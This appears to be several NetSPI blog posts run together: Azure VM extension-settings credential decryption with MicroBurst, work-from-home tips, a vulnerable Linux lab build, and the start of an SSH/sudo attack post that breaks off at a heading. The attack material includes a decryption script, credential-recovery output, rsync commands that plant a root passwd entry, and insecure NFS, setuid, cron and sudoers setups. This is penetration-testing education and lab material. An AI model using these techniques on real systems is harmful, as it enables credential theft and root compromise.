
Decrypting Azure VM Extension Settings with Get-AzureVMExtensionSettings

TL;DR

If you’re a local admin on an Azure VM, run the Get-AzureVMExtensionSettings script from MicroBurst to decrypt VM extension settings and potentially view sensitive parameters, storage account keys, and the local Administrator username and password.

Overview

The Azure infrastructure needs a mechanism to communicate with and control virtual machines. All Azure Marketplace images have the Azure Virtual Machine Agent (VM Agent) installed for this purpose.  Azure pre-packages some executable tasks as VM Extensions. The VM Agent downloads the extensions from the Azure infrastructure, executes them, and sends back the results. The settings and configuration for each extension are saved to disk, and any potentially sensitive information within those settings is encrypted.

The newly added Get-AzureVMExtensionSettings PowerShell cmdlet in NetSPI’s MicroBurst repository attempts to decrypt and report all available configuration information saved from previously executed extensions on a VM. Depending on how VM extensions have been utilized on the VM, this configuration may contain sensitive command parameters, storage account keys, or even the Administrator username and password.

Background

The Azure Fabric Controller acts as the middleware between the actual data center hardware and the various Windows Azure services. It is responsible for data center resource allocation/provisioning and the health/lifecycle management of the services.

Within Azure VMs, the VM Agent “manages interactions between an Azure VM and the Azure Fabric Controller. The VM agent is responsible for many functional aspects of deploying and managing Azure VMs, including running VM extensions.” The extension packages are downloaded from the Fabric Controller “through the privileged channel on private IP 168.63.129.16.”

Extensions’ .settings Files

When the extension packages are downloaded, their necessary files are stored on the VM’s file system at:

C:\Packages\Plugins\<ExtensionName>\<ExtensionVersion>\

For example, the CustomScriptExtension’s files would be saved to:

C:\Packages\Plugins\Microsoft.Compute.CustomScriptExtension\1.10.5\

This directory stores binaries, deployment scripts, status logs and more. Most importantly, it also stores the configuration information.

The exact information required is different for each extension, but this configuration is stored in the same format for all extensions. The configuration information is stored as a JSON object at the following path:

C:\Packages\Plugins\<ExtensionName>\<ExtensionVersion>\RuntimeSettings\<#>.settings

For example, the CustomScriptExtension would store its settings file at the following path:

C:\Packages\Plugins\Microsoft.Compute.CustomScriptExtension\1.10.5\RuntimeSettings\0.settings

Analyzing Settings for Sensitive Information

Each extension’s .settings file has the following structure:

{
  "runtimeSettings": [
    {
      "handlerSettings": {
        "protectedSettingsCertThumbprint": "<Thumbprint of Certificate Used to Encrypt the ProtectedSettings>",
        "protectedSettings": "Base64-Encoded Encrypted Settings",
        "publicSettings": { <Plaintext JSON Object for non-sensitive settings > }
      }
    }
  ]
}

The settings are specific to each extension, but we are interested in viewing the contents of the “protectedSettings” where potentially sensitive information is stored.

The Get-AzureVMExtensionSettings cmdlet retrieves this information through the following steps:

  1. Find all .settings files on the VM for each extension.
  2. Apply the following steps to each settings file:
    1. If the .settings file has a valid “protectedSettingsCertThumbprint” value, find the corresponding certificate on the VM.
    2. If the certificate is found and its private key is accessible, decrypt the “protectedSettings” value.
    3. Output the decrypted “protectedSettings” value along with the rest of the information in the .settings file.

This allows us to easily review the plaintext values of the “protectedSettings” if the cmdlet can identify the corresponding certificate.
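
For illustration, the core of that decryption can be sketched in a few lines of PowerShell. This is a minimal sketch rather than the MicroBurst implementation: $settingsPath is a hypothetical placeholder for a discovered .settings file, the certificate is assumed to live in the LocalMachine\My store with an accessible private key, and the blob is assumed to be a standard CMS/PKCS#7 envelope.

Add-Type -AssemblyName System.Security
# $settingsPath is a hypothetical path to a .settings file found in step 1
$json = Get-Content $settingsPath -Raw | ConvertFrom-Json
$handler = $json.runtimeSettings[0].handlerSettings

# Locate the certificate referenced by the thumbprint (assumed store: LocalMachine\My)
$cert = Get-ChildItem Cert:\LocalMachine\My |
    Where-Object { $_.Thumbprint -eq $handler.protectedSettingsCertThumbprint }

# Decode the Base64 blob and decrypt it with the certificate's private key
$cms = New-Object System.Security.Cryptography.Pkcs.EnvelopedCms
$cms.Decode([Convert]::FromBase64String($handler.protectedSettings))
$cms.Decrypt((New-Object System.Security.Cryptography.X509Certificates.X509Certificate2Collection($cert)))
[System.Text.Encoding]::UTF8.GetString($cms.ContentInfo.Content)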

Secondary Settings Location

The .settings files nested deeply within C:\Packages\Plugins\ are useful, but not always complete. For example, the VMAccess extension (which resets Administrator credentials on the VM) truncates its .settings file as part of its execution. Additionally, sometimes the “protectedSettingsCertThumbprint” value references a certificate which has already been rotated and is unavailable on the VM. In these instances, we can’t recover the sensitive configuration information in the “protectedSettings” value.

However, there is a workaround! It was discovered that the JSON contents of these .settings files are also copied into an XML file within a ZIP file at the following path:

C:\WindowsAzure\CollectGuestLogsTemp\<GUID>.zip\Config\WireServerRoleExtensionsConfig_<GUID>_<VM-Name>.xml

The contents of this XML file are kept up to date with the current encryption certificate, being re-encrypted as necessary. This means that the certificate should always be available on the VM and ready to decrypt the “protectedSettings” value. Additionally, the settings in the XML file are not redacted. This means that we can decrypt the settings of the VMAccess extension which include the Administrator username and password. The only downside of this XML file is that it appears to only contain information about the latest execution of each extension. This is fine for the VMAccess extension (since we’re most interested in the latest username and password) but less helpful for the RunCommand extension (where we may want to see past executions as well).
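
As an aside, reading that XML doesn’t require extracting the ZIP to disk. Below is a minimal sketch of pulling the config entry straight out of the archive; the wildcard patterns are assumptions, since the GUID file names vary per VM.

# Open a CollectGuestLogsTemp ZIP and read the extensions config XML in memory
Add-Type -AssemblyName System.IO.Compression.FileSystem
$zipFile = Get-ChildItem 'C:\WindowsAzure\CollectGuestLogsTemp\*.zip' | Select-Object -First 1
$archive = [System.IO.Compression.ZipFile]::OpenRead($zipFile.FullName)
$entry = $archive.Entries | Where-Object { $_.Name -like 'WireServerRoleExtensionsConfig_*.xml' }
$reader = New-Object System.IO.StreamReader($entry.Open())
[xml]$config = $reader.ReadToEnd()
$reader.Close(); $archive.Dispose()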

Attack Scenario Setup

Let’s demonstrate the cmdlet’s usage. First, we’ll act as an Azure admin creating the vulnerable environment by performing some actions on a VM through extensions (running a command and resetting the Administrator credentials). Then, we’ll act as an attacker using Get-AzureVMExtensionSettings to retrieve the sensitive information.

Executing scripts through the RunCommand extension

Let’s pretend we’re an Azure Administrator tasked with joining a VM to a domain using existing Administrator credentials. There are several ways to accomplish this, but a tantalizingly easy approach would be to perform this through a PowerShell script using the RunCommand feature. Although it’s against best practices, the Administrator credentials could be passed as parameters to the script. We may believe we’re protected because the script parameters are encrypted and stored in “protectedSettings.”

Using the Azure Cloud Shell, that command could look like the following:

PS Azure:\> az vm run-command invoke --command-id RunPowerShellScript --name <VMName> -g <ResourceGroup> --scripts @join-domain-script.ps1 --parameters "user=admin" "password=secret-password"

Once the command is issued, the VM Agent on the target VM would pull the RunCommand extension from the Azure Fabric Controller. It would create a .settings file in a path like the following:

C:\Packages\Plugins\Microsoft.CPlat.Core.RunCommandWindows\1.1.3\RuntimeSettings\0.settings

The settings are also copied into the WireServerRoleExtensionsConfig_<GUID>_<VM-Name>.xml file in the ZIP file described earlier. The specified PowerShell script would be executed by the VM agent and the VM would join the domain.

Resetting Administrator Credentials through the VMAccess extension

Let’s pretend that we also need to reset the Administrator credentials for the VM. This can be done graphically through the Portal or through PowerShell. In either case, this functionality utilizes the VMAccess extension to accomplish the task on the VM. As the admin running the command, we simply provide a new username and password for the VM Administrator account. The VMAccess extension will update the Administrator credentials on the VM and create an empty .settings file in a path like the following:

C:\Packages\Plugins\Microsoft.Compute.VMAccessAgent\2.4.5\RuntimeSettings\0.settings

This empty file wouldn’t be useful for an attacker, but the non-redacted settings are copied into the WireServerRoleExtensionsConfig_<GUID>_<VM-Name>.xml file.

Running Get-AzureVMExtensionSettings as an attacker

Now let’s switch roles to the attacker. We’ll assume that we’ve obtained Administrator access to the VM (perhaps through having the Contributor role or compromising a privileged service) and that we can run PowerShell commands. To use the Get-AzureVMExtensionSettings cmdlet, we’ll first download and extract the latest copy of the MicroBurst repo.

PS C:\> Invoke-WebRequest https://github.com/NetSPI/MicroBurst/archive/master.zip -OutFile C:\tmp\mb.zip
PS C:\> Expand-Archive C:\tmp\mb.zip -DestinationPath C:\tmp\

If we want the full MicroBurst functionality, we could import the top-level MicroBurst.psm1 module. In our case, we’ll only need to run the individual script so we’ll import it directly. Let’s import it, run it, and investigate the results.

PS C:\> Import-Module C:\tmp\MicroBurst-master\Misc\Get-AzureVMExtensionSettings.ps1
PS C:\> Get-AzureVMExtensionSettings
FullFileName : C:\Packages\Plugins\Microsoft.CPlat.Core.RunCommandWindows\1.1.3\RuntimeSettings\0.settings
ProtectedSettingsCertThumbprint : CFE7419...
ProtectedSettings : MIICUgYJKoZIhvc...
ProtectedSettingsDecrypted : {"parameters":[{"name":"user","value":"admin"},{"name":"password","value":"secret-password"}]}
PublicSettings : {"script": …}
…
FileName : C:\WindowsAzure\CollectGuestLogsTemp\491f155a-5a14-4fb2-8aad-08598b61f6c9.zip\Config\WireServerRoleExtensionsConfig_b4817d34-70d7-4e8f-bee6-6b8eea40aef7._MGITest.xml
ExtensionName : Microsoft.Compute.VMAccessAgent
ProtectedSettingsCertThumbprint : F67D19B6F4C1E1C1947AF9B4B08AFC9EAED9CBB2
ProtectedSettings : MIIB0AYJK…
ProtectedSettingsDecrypted : {"Password":"MySecretPassword!"}
PublicSettings : {"UserName":"MyAdministrator"}

In the above output, we can see that the Get-AzureVMExtensionSettings cmdlet returned decrypted parameters from the RunCommand extension’s 0.settings file and Administrator credentials from the VMAccess extension’s settings stored in the XML file within a ZIP.

With this information, we may be able to pivot further into the domain or Azure environment, spreading to other VMs, Storage Accounts, and more.

The cmdlet will return all available settings information from previously applied VM extensions, even if the script is unable to properly decrypt the protectedSettings field.

The cmdlet can also produce CSV results by piping the results into the standard Export-CSV cmdlet like so: Get-AzureVMExtensionSettings | Export-CSV -Path C:\tmp\results.csv. The output results.csv will have one row for each extension processed.

Previous Research

In 2018, Guardicore published a blog and corresponding tool using this technique. Their exploit targeted a specific version of the VMAccess extension, which can be used to reset Administrator credentials on a VM. As mentioned previously, recent updates to the VMAccess extension have mitigated this by clearing the contents of that .settings file after the extension has completed its task. The Get-AzureVMExtensionSettings cmdlet provides a much broader scope by analyzing all extensions and including the secondary settings location, which circumvents Microsoft’s mitigations.

Responsible Disclosure

The issues discussed in this post were reported to the Microsoft Security Response Center (MSRC) on January 22, 2020, including steps and sample code to reproduce. The case numbers were VULN-015273 and VULN-015274. After understanding that the exploit requires Administrator privileges on the VM, the cases were closed with the following comment:

Our team investigated the issue, and this does not meet the bar for servicing by MSRC, since this requires elevated privileges.
We have informed the team about this, but will not be tracking this. As such, we are closing this case.


Acknowledgements

A big thanks to Karl Fosaaen for the suggestion to dive into this functionality and support through the MSRC process.


#WFH – Embracing the New Norm of Working From Home

Pandemics Happen: You Can’t Predict a Crisis

A worldwide pandemic broke out, and your employer is asking you to work from home instead of coming into the office. Well, you’re not alone. This is the situation that many people have found themselves in during this Covid-19 pandemic.

Although it may seem like no big deal at first, working from home daily for an extended period of time is vastly different than going into the office every day. For some, the line of work-life balance gets even more blurred than before.

The hurdles of working from home tend to amplify in our current situation when people are trying to work from home and have their children at home (instead of at school) all day too. People try to make light of the situation they’re in by sharing some really funny posts on social media, like the one from Jason White:

This is truly the new normal for all of us, and there’s no certainty as to how much longer this pandemic is going to force people to work from home.

Luckily for us, today we are extremely well connected via the Internet, and leveraging cloud-based software solutions/Software-as-a-Service (SaaS), Virtual Private Networks (VPN), Virtual Desktop Infrastructure (VDI), etc. makes it easy for some organizations to enable their workforce to work effectively from home.

This pandemic is also the first time many of these organizations are actually executing their Business Disaster Recovery (BDR) and Business Continuity Plans (BCP). Businesses are quickly learning from the challenges since these plans are very different when they’re being documented theoretically versus when they’re being executed in a real-time crisis.

Getting Comfortable With “The New Norm”

Let’s face it, as humans since the beginning of time, we’ve always had to adapt to different challenges. This is no different. This might be the new normal for a while, until we figure out how to get this pandemic under control.

I’ve been very fortunate at various parts of my career to have the experience of working from home or starting a consulting practice from scratch in a new geographic region – where at the beginning, there’s no office to work out of.

Here are a few things that have worked well for me, allowing me to work effectively from home and, during a time of crisis like a pandemic, avoid feeling isolated.

1. Create a Dedicated Space for Work

It’s important to create a separate area for you to dedicate to work. Ideally you want a space where you can close the door and seclude yourself for taking phone calls, conference calls, video conferences, or just shutting out any distractions when you need to get some work done.

This is important as you can create a virtual boundary for when you’re working and when you’re not. Force yourself to leave this space when you take breaks (whether it be to get some coffee, go for a walk, grab lunch, etc.). This allows you to mimic some of the social norms that you’d have while at the office – like taking a bathroom break, walking to the kitchen to grab a coffee or going out for lunch with your coworkers – where you end up leaving your actual workspace multiple times during the day to let your mind take a break from work.

2. Get Your Technology Set Up Properly

Ergonomics is important, but so is getting actual equipment and connectivity that will allow you to be most effective while working from home. There are plenty of resources online discussing how to set up your workspace with proper ergonomics that fit your needs. I would like to focus on the technology side of things, where certain equipment can make your life significantly less stressful when working from home.

First, invest in a strong and reliable Internet connection. High speed Internet has become really affordable, and most organizations that require their workforce to work from home will usually subsidize some (if not all) of your Internet bill. I recommend getting a reliable and fast connection – this will pay dividends in the long run as you have more and more video conference calls and can start using your VOIP setup if your organization has one.

Second, for making phone calls, if I’m at my desk, I typically use my VOIP setup that NetSPI provides all their employees through Microsoft Teams. I have a dedicated work number where people can reach me, and I use it to make calls from my desk (and even sometimes from my smartphone if I’m somewhere with a spotty cell network but I have a strong Wi-Fi connection).

Third, make sure you get a big monitor/display if you can. You’re going to be hunkered down in a small space, and forcing yourself to work on a small laptop screen ends up being very stressful, especially today when all of us are multi-tasking. An extra monitor is extremely helpful in reducing the amount of back-and-forth between applications. If an extra monitor isn’t viable, Mac users may be able to use an iPad as an extra screen with Sidecar and keep a regularly used application or window on it, so you don’t have to constantly switch windows. If you cannot have a multiple-screen setup, you can still leverage your operating system’s features like “Spaces” on a Mac or “Virtual Desktops” on a Windows machine to have multiple virtual screens set up for different purposes (e.g. one screen for things you’re actively working on and a second screen for all communications, like instant messaging and email).

Here’s a view of my work-setup at home:

Screens and their usage from left to right:

  • I use my iPad Pro as an extra screen with Sidecar to always have my email on display. I like using a stand (Lamicall tablet stand) for the iPad to help raise it a little closer to the height of the other screens.
  • The main monitor (Dell U3818DW) I use for things I’m actively working on – usually things like document creation, web browsing, news feeds, taking notes, etc. – this is basically my active workspace.
  • My MacBook Pro is on a stand to bring it to an eye-level height for me, and I am usually running my virtual machines to perform scanning work, or security testing as I research new things and try to learn and keep up with new technologies as they evolve in the security space.

You’ll also notice that I have a gel-pad for my wrist that spans my keyboard and my mouse. This is because in the past I started experiencing aches in my wrists and was worried about developing Carpal Tunnel Syndrome. The pad has helped tremendously to relieve a lot of stress in my hands and shoulders as well.

I also invested in getting myself a nice webcam (Logitech C920S HD Pro), with a privacy shutter. Currently I work remotely from home – even outside of Covid-19 – so I try to make sure that on all conference calls I have my video turned on. I find that it encourages others to turn on their video too making the virtual meetings feel more intimate and also makes you feel more connected with others on your team. Make sure to try and place the camera close to eye-level and at an angle where it’s facing you directly, if possible. Here are some tips on how to kick your video conferencing game up a notch and look more professional during your video calls. As we get more connected globally, and business today happens across all borders and oceans, video conferencing is going to start being more and more prominent. It’s time we start mastering video conferencing.

Here are some home-office setups from some of our other NetSPI colleagues:

3. Embrace Your New “Co-Workers”

All of a sudden, you’re cohabiting and working with some “creatures” that you would normally be away from while at the office. This may be your children, parents, significant other, cat, dog, duck, gecko, etc.

You need to accept that you’ll be “co-working” together and potentially sharing and intruding on each other’s space from time to time. The sooner you accept it, the less friction you’ll have, and you can plan to share the space peacefully. Be grateful for the extra time that you might have with your family, children or your pets – they are definitely excited to have more time with you.

With family members, make sure you have some way to signal them if you’re in the middle of working on something or if on a conference call and need to avoid distractions. For me, when the door to my home office is closed, my pets and my family members know not to bother me. When the door is open, they are welcome to share space as long as they’re not being overbearing or too distracting.

Pets can also be very therapeutic, especially at a time when you’re physically distancing from everyone and may start feeling isolated. Accept them into your space. Let them sleep at your feet (or on your lap for that lap dog or lap cat). Pet them from time to time and let them know that you appreciate the way they naturally relieve your stress and give you a sense of companionship and support that all humans crave.

At NetSPI we have created a Slack channel called #pets_of_netspi where we all share pictures and videos of our new fuzzy (and some non-fuzzy) “co-workers” that help us get through our day. Here’s just a preview of some of our #pets_of_netspi rockstars:

4. Virtual Lunch and Coffee Video Conferences

Just like you don’t always talk to your coworkers in the office about work, you need to continue harboring both a professional and personal relationship with your colleagues. We discussed how video conferences have become more prominent – not only that, but Microsoft is making Teams available for everyone to help in the face of the Covid-19 pandemic. With technical solutions being at our disposal today, take advantage of this, and schedule virtual lunch meetings or coffee meetings with colleagues. Take a break from work and discuss non-work related topics like you normally would during lunch or coffee.

5. Maintain a Routine

Even though none of your colleagues or boss would know if you didn’t brush your teeth, stay in your pajamas all day, or even shower for days, it doesn’t mean you should start getting lazy about your regular day-to-day activities. Make sure you still maintain a regular routine. Things like going to bed and waking up at a consistent time, making your bed, making yourself a healthy breakfast, taking your dog for a morning walk, exercising, meditating, etc. are all important factors that will make you more effective at your work.

Taking some breaks and setting aside some personal time is always healthy. Pick up meditation or take a quick walk around the neighborhood, text or call your loved ones and check in on how they are doing in this moment of crisis.

Another thing you may want to consider is picking up a new skill or hobby. Now that you have all that extra time from not commuting back and forth from the office, you have no excuse. Always wanted to be able to pick up a guitar and play some sick tunes? Well, now is your chance to start learning and practicing. Want to complete your New Year’s resolution of losing those 15 extra pounds you gained over the holidays? Well, maybe now it’s time to start some workout programs that you can do at home. Maybe you always wanted to better yourself with more education? I’ve actually been spending time taking some free Ivy League courses online on topics that I’ve always been interested in delving into deeper.

6. Organize Virtual Social Events with Your Company or Team

Little things can make a big difference in a team’s morale and also help build camaraderie and a sense of togetherness. Organizing a virtual happy hour or just a video conference call to check-in with everyone and hang out helps reduce the feeling of isolation that everyone is facing from physical distancing.

Last Friday evening right at the end of business hours, we organized a virtual video happy hour event at NetSPI. It was wonderful to see everyone join in, with their favorite beverages in hand, and enthusiasm to see and connect with the rest of the team. Some did the video conference from the deck in their backyard, some took it from their home office setup, and one even joined from his kid’s bedroom where he was assembling furniture for his kids. The most excitement actually came when pet owners started showing off their pets to each other, and the pets got to greet their new friends during the video conference. Various topics were discussed (completely non-work related) as everyone was facing similar circumstances. People even shared ideas they had for activities they were going to attempt over the weekend while trying to practice social distancing.

7. Over-Communicate

You’re not going to get the opportunity to run into your boss or coworker in the hallway and mention all the cool things you’re working on, the amazing meeting you had with a client, or the really amazing discovery you made while doing an assessment. So make sure you’re over-communicating and keeping everyone looped in. Send regular status updates to your managers and your teams. As a manager, make sure you communicate regularly with your team members to confirm they’re all on track, try to spot any challenges they’re facing early, and help sooner rather than later. Keeping your team and your management updated regularly is key to making sure everyone’s on the same page. If you have customers that you interface with regularly, the need for regular communication is even more important at times like this, since your business probably depends heavily on the customers’ current state of business.

Putting It All Together

Remember, you’re not in this situation alone. This working from home situation is turning out to be the new normal. Create a separate workspace dedicated for working. Make sure you get the right technology or accessories to be efficient and effective at your job. Embrace the fact that you’re going to be sharing space and spending more time with your family and pets at home while you’re working. Maintain a routine and stay active both mentally and physically. Set aside time for virtual social activities over video conference. Lastly, make sure you over-communicate and keep everyone looped in on necessary updates.

Hopefully you find these tips helpful as you try to adjust and get acclimated to working from home. If you have comments or other tips that have worked well for you, we would love to hear from you. Share them with us via Twitter by tweeting to @NetSPI with #WorkFromHome.


Linux Hacking Case Studies Part 5: Building a Vulnerable Linux Server

This blog will share how to configure your own Linux server with the vulnerabilities shown in the “Linux Hacking Case Studies” blog series. That way you can practice building and breaking at home. Similar to the rest of the series, this blog is really intended for people who are new to penetration testing, but hopefully there is a little something for everyone. Enjoy!

Below are links to the first four blogs in the series:

Below is an overview of what will be covered in this blog:

Lab Scenarios

This section briefly summarizes the lab scenarios that you’ll be building which are based on this blog series.

Scenario 1
  Remote vulnerability: Excessive privileges configured on a Rsync server.
  Local vulnerability: Excessive privileges configured on the Rsync server.  Specifically, the server is configured to run as root.
  Escalation path: Create a new privileged user by adding lines to the shadow, passwd, groups, and sudoers files.

Scenario 2
  Remote vulnerability: Excessive privileges configured on an NFS export.
  Local vulnerability: Insecure setuid binary that allows arbitrary code execution as root.
  Escalation path: Review setuid binaries and determine which ones have the direct or indirect capability to execute arbitrary code as root.

Scenario 3
  Remote vulnerability: Weak password configured for phpMyAdmin.
  Local vulnerability: Excessive privileges configured on a script that is executed by a root cron job.  Specifically, the script file is world writable.
  Escalation path: Write a command to the world-writable script that starts a netcat listener.  When the root cron job executes the script, the netcat listener will start as root.  Then it’s possible to connect to the netcat listener remotely to obtain root access.  (Reverse shell alternatives here.)

Scenario 4
  Remote vulnerability: Weak password configured for SSH.
  Local vulnerability: Insecure sudoers configuration that allows arbitrary code execution as root through sudo applications.
  Escalation path: Review sudo applications to determine which ones have the direct or indirect capability to execute arbitrary code as root.  Examples include sh, VI, python, netcat, and the use of a custom nmap module.

Kali VM and Install Dependencies

For this lab, we’ll be building our vulnerable services on a standard Kali image.  If you don’t already have a Kali VM, you can download one from their website to get set up.  Once your Kali VM is ready to go, you’ll want to install some packages that will be required for setting up the scenarios in the lab.  Make sure to sign in as root; you’ll need those privileges to set up the lab.

Install Required Packages

apt-get update
apt-get install nfs-kernel-server
apt-get install nfs-common
apt-get install ufw
apt-get install nmap

Clear Firewall Restrictions

iptables --flush
ufw allow from any to any
ufw status

With that out of the way let’s dive in.

Lab Setup: Rsync

Attack Lab: Linux Hacking Case Study Part 1: Rsync

In this section we’ll cover how to configure an insecure Rsync server.  Once you’re logged in as root execute the commands below.

Let’s start by creating the rsyncd.conf configuration file with the commands below:

echo "motd file = /etc/rsyncd.motd" > /etc/rsyncd.conf
echo "lock file = /var/run/rsync.lock" >> /etc/rsyncd.conf
echo "log file = /var/log/rsyncd.log" >> /etc/rsyncd.conf
echo "pid file = /var/run/rsyncd.pid" >> /etc/rsyncd.conf
echo " " >> /etc/rsyncd.conf
echo "[files]" >> /etc/rsyncd.conf
echo " path = /" >> /etc/rsyncd.conf
echo " comment = Remote file share." >> /etc/rsyncd.conf
echo " uid = 0" >> /etc/rsyncd.conf
echo " gid = 0" >> /etc/rsyncd.conf
echo " read only = no" >> /etc/rsyncd.conf
echo " list = yes" >> /etc/rsyncd.conf


Next, let’s setup the rsync Service:

systemctl enable rsync
systemctl start rsync
or
systemctl restart rsync

Verify the Configuration

rsync 127.0.0.1::
rsync 127.0.0.1::files

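With the module shared as root, the remote attack covered in Part 1 boils down to pulling a sensitive file, modifying it, and pushing it back. Below is a rough sketch from the attacking machine; the IP address is this lab’s example address, and the appended passwd line (a UID 0 user with an empty password) is for illustration only.

# Pull /etc/passwd through the root rsync module
rsync 192.168.1.171::files/etc/passwd .
# Append a UID 0 user, then push the file back (rsync writes it as root)
echo 'backdoor::0:0:root:/root:/bin/bash' >> passwd
rsync ./passwd 192.168.1.171::files/etc/passwd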

Lab Setup: NFS

Attack Lab: Linux Hacking Case Study Part 2: NFS

In this section we cover how to configure insecure NFS exports and an insecure setuid binary.  Once you’re logged in as root execute the commands below.

Configure NFS Exports

Create NFS Exports

echo "/home *(rw,sync,no_root_squash)" >> /etc/exports
echo "/ *(rw,sync,no_root_squash)" >> /etc/exports

Start NFS Server

systemctl start nfs-kernel-server.service
systemctl restart nfs-kernel-server

Verify NFS Export

showmount -e 127.0.0.1

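From the attacking machine, the export can then be mounted directly. Because the export is configured with no_root_squash, files created by root on the client stay root-owned on the server. A quick sketch (the IP is this lab’s example address):

mkdir /tmp/mnt
mount -t nfs 192.168.1.171:/ /tmp/mnt
ls /tmp/mnt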

Create Password Files for Discovery

echo "user2:test" > /root/user2.txt
echo "test:password" > /tmp/creds.txt
echo "test:test" > /tmp/mypassword.txt


Enable password authentication through SSH.

sed -i 's/PasswordAuthentication no/PasswordAuthentication yes/g' /etc/ssh/sshd_config
service ssh restart

Create Insecure Setuid Binary

Create the source code for a binary that can execute arbitrary OS commands called exec.c:

echo "#include <stdlib.h>" > /home/test/exec.c
echo "#include <stdio.h>" >> /home/test/exec.c
echo "#include <unistd.h>" >> /home/test/exec.c
echo "#include <string.h>" >> /home/test/exec.c
echo " " >> /home/test/exec.c
echo "int main(int argc, char *argv[]){" >> /home/test/exec.c
echo " " >> /home/test/exec.c
echo " printf("%s,%dn", "USER ID:",getuid());" >> /home/test/exec.c
echo " printf("%s,%dn", "EXEC ID:",geteuid());" >> /home/test/exec.c
echo " " >> /home/test/exec.c
echo " printf("Enter OS command:");" >> /home/test/exec.c
echo " char line[100];" >> /home/test/exec.c
echo " fgets(line,sizeof(line),stdin);" >> /home/test/exec.c
echo " line[strlen(line) - 1] = ''; " >> /home/test/exec.c
echo " char * s = line;" >> /home/test/exec.c
echo " char * command[5];" >> /home/test/exec.c
echo " int i = 0;" >> /home/test/exec.c
echo " while(s){" >> /home/test/exec.c
echo " command[i] = strsep(&s," ");" >> /home/test/exec.c
echo " i++;" >> /home/test/exec.c
echo " }" >> /home/test/exec.c
echo " command[i] = NULL;" >> /home/test/exec.c
echo " execvp(command[0],command);" >> /home/test/exec.c
echo "}" >> /home/test/exec.c

Compile exec.c:

cd /home/test
gcc -o exec exec.c
rm exec.c

Configure setuid on exec so that we can execute commands as root:

chmod 4755 exec


Verify you can execute the exec binary as a least privilege user.

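If everything worked, a run as an unprivileged user should look something like the sketch below. The UID of 1000 is just an example; the EXEC ID of 0 confirms the setuid bit is working.

su - test
/home/test/exec
USER ID:,1000
EXEC ID:,0
Enter OS command:whoami
root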

Lab Setup: phpMyAdmin

Attack Lab: Linux Hacking Case Study Part 3: phpMyAdmin

In this section we’ll cover how to configure an insecure instance of phpMyAdmin, a root cron job, and a script that’s world writable.  Once you’re logged in as root execute the commands below.

Reset the root Password (this is mostly for existing MySQL instances)

We’ll start by resetting the root password on the local MySQL instance.  MySQL should be installed by default in Kali, but if it’s not on your build you’ll have to install it first.

# Stop mysql
/etc/init.d/mysql stop

# Start MySQL in safe mode and log in as root
mysqld_safe --skip-grant-tables&
mysql -uroot

# Select the database to use
use mysql;

# Reset the root password
update user set password=PASSWORD("password") where User='root';
flush privileges;
quit

# Restart the server
/etc/init.d/mysql stop
/etc/init.d/mysql start

# Confirm update by logging in with new password
mysql -u root -p
exit

Install PHPMyAdmin

Alrighty, time to install phpMyAdmin.

apt-get install phpmyadmin

Eventually you will be presented with a GUI. Follow the instructions below.

  1. Choose apache2 for the web server. Warning: When the first prompt appears, apache2 is highlighted, but not selected. If you do not hit Space to select Apache, the installer will not move the necessary files during installation. Hit Space, Tab, and then Enter to select Apache.
  2. Select yes when asked whether to use dbconfig-common to set up the database.
  3. You will be prompted for your database administrator’s password, which should be set to “password” to match the lab.

After the installation we still have a few things to do. Let’s create a soft link in the webroot to phpmyadmin.

ln -s /usr/share/phpmyadmin/ /var/www/phpmyadmin

Then, let’s restart the required services:

service apache2 restart
service mysql restart

Next, let’s add the admin user we’ll be guessing later.

mysql -u root
use mysql;
CREATE USER 'admin'@'%' IDENTIFIED BY 'password';
GRANT ALL PRIVILEGES ON *.* TO 'admin'@'%' WITH GRANT OPTION;
exit

Finally, configure excessive privileges in the webroot just for fun:

cd /var/www/
chown -R www-data *
chmod -R 777 *

When it’s all done, you should be able to verify the setup by logging into https://127.0.0.1/phpmyadmin as the “admin” user with a password of “password”.


Create a World Writable Script

Next up, let’s make a world writable script that will be executed by a cron job.

mkdir /scripts
echo "echo hello world" >> /scripts/rootcron.sh
chmod -R 777 /scripts

Create Root Cron Job
Now, let’s configure a root cron job to execute the script every minute.

echo "* * * * * /scripts/rootcron.sh" > mycron

You can then verify the cron job was added with the command below.

crontab -l


Lab Setup: Sudoers

Attack Lab: Linux Hacking Case Study Part 4: Sudoers Horror Stories
This section outlines how to create a sudoers configuration that allows the execution of applications that can run arbitrary commands.

Create Encrypted Password
The command below will allow you to create an encrypted password for generating test users. I originally found this guidance at https://askubuntu.com/questions/94060/run-adduser-non-interactively.

openssl passwd -crypt test

Next you can add new users using the generated password below.  This is not required, but handy for scripting out environments.

useradd -m -p O1Fug755UcscQ -s /bin/bash test
useradd -m -p O1Fug755UcscQ -s /bin/bash user1
useradd -m -p O1Fug755UcscQ -s /bin/bash user2
useradd -m -p O1Fug755UcscQ -s /bin/bash user3
useradd -m -p O1Fug755UcscQ -s /bin/bash tempuser

Create an Insecure Sudoers Configuration
The sudoers configuration below will allow vi, nmap, python, and sh to be executed as root by test and user1.

echo "Cmnd_Alias ALLOWED_CMDS = /usr/bin/vi, /usr/bin/nmap, /usr/bin/python3.6, /usr/bin/python3.7, /usr/bin/sh" > /etc/sudoers
echo "test ALL=(ALL) NOPASSWD: ALLOWED_CMDS" >> /etc/sudoers
echo "user1 ALL=(ALL) NOPASSWD: ALLOWED_CMDS" >> /etc/sudoers

When it’s all done, you can log in as the previously created test user to verify the sudo applications are available:


Wrap Up

In this blog we covered how to configure your own vulnerable Linux server, so you can learn in a safe environment.  Hopefully the Linux Hacking Case Studies blog series was useful for those of you who are new to the security community.  Stay safe and hack responsibly!


Linux Hacking Case Studies Part 4: Sudo Horror Stories

This blog will cover different ways to approach SSH password guessing and attacking sudo applications to gain a root shell on a Linux system. This case study commonly makes appearances in CTFs, but the general approach for attacking weak passwords and sudo applications can be applied to many real world environments. This should be a fun walk through for people new to penetration testing.

This is the fourth of a five part blog series highlighting entry points and local privilege escalation paths commonly found on Linux systems during network penetration tests.

Below are links to the first three blogs in the series:

Below is an overview of what will be covered in this blog:

Finding SSH Servers

Before we can start password guessing or attacking sudo applications, we need to find some SSH servers to go after.  Luckily Nmap and similar port scanning tools make that pretty easy because most vendors still run SSH on the default port of 22.

Below is a sample Nmap command and screenshot to get you started.

nmap -sS -sV -p22 192.168.1.0/24 -oA sshscan

Once you’ve run the port scan you can quickly parse the results to make a file containing a list of SSH servers to target. Below is a command example and quick video to help illustrate.

grep -i "open" sshscan.gnmap
grep -i "open" sshscan.gnmap | awk -F ' ' '{print $2} '> ssh.txt
cat ssh.txt

Dictionary Attacks against SSH Servers

